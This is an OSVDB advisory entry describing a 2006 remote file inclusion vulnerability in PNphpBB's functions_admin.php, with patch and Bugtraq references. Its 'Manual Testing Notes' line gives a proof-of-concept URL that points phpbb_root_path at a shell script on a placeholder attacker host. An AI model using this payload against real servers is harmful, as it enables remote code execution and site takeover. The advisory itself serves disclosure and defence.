PNphpBB includes/functions_admin.php phpbb_root_path Variable Remote File Inclusion

2006-09-18T14:18:24
ID OSVDB:30830
Type osvdb
Reporter OSVDB
Modified 2006-09-18T14:18:24

Description

Manual Testing Notes

http://[target]/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://[attacker]/shell.txt?

References:

Vendor Specific Solution URL: http://noc.postnuke.com/frs/download.php/1094/patch_1.2g-1.2i.diff.gz Security Tracker: 1016912 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0351.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0283.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0343.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0345.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0335.html ISS X-Force ID: 29014 Generic Exploit URL: http://www.milw0rm.com/exploits/2390 CVE-2006-4968 Bugtraq ID: 20097